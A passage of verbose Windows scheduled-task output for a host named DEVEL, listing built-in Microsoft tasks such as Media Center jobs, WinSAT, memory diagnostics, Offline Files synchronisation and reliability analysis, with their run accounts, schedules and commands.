Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\System32\LocationNotifications.exe
Start In:                             N/A
Comment:                              Location Activity
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Maintenance
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Maintenance\WinSAT
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 11:49:04
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Measures a system's performance and capabilities
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Administrators
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Media Center
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In:                             N/A
Comment:                              Privileged Media Center Time Update Service setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In:                             N/A
Comment:                              Privileged Media Center DRM initialization job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center PlayReady install job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\mcupdate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\mcupdate $(Arg0)
Start In:                             N/A
Comment:                              Check for Media Center updates.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Media Center Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Object Store Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURActivate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In:                             N/A
Comment:                              Privileged Media Center OCUR activation job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\ehome\MCUpdate.exe -pscn 0
Start In:                             N/A
Comment:                              Background periodic scanner - PeriodicScanRetry
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only
Start Time:                           5:33:00
Start Date:                           9/9/2006
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Pvr Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform PVR Scheduling activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehrec /RestartRecording
Start In:                             N/A
Comment:                              Restarts recordings after a power failure.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Search registration job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Data Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recorder Permission setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MemoryDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MobilePC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MobilePC\HotStart
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Launches applications configured for Windows HotStart
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MUI
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MUI\LPRemove
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:16:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\lpremove.exe
Start In:                             N/A
Comment:                              Launch language cleanup tool
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Multimedia
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              System Sounds User Mode Agent
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\NetTrace
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs
Start In:                             $(Arg1)
Comment:                              Network information collector
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Offline Files
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task controls periodic background synchronization of Offline Files when the user is working in an offline mode.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only, Hourly
Start Time:                           12:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        6 Hour(s), 0 Minute(s)
Repeat: Until: Time:                  None
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Logon Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task initiates synchronization of Offline Files when a user logs onto the system.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 24:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\PLA
INFO: There are no scheduled tasks presently available at your access level.

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
Next Run Time:                        24/9/2019 7:25:41
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:10:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %SystemRoot%\System32\powercfg.exe -energy -auto
Start In:                             N/A
Comment:                              This job analyzes the system looking for conditions that may cause high energy use.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 5 minutes, If Not Idle Retry For 120 minutes
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 00:05:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           6:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 Every 14 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\RAC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:12:49
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\RAC\RacTask
Next Run Time:                        14/9/2019 3:07:44
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        14/9/2019 1:08:36
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Microsoft Reliability Analysis task to process system reliability data.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
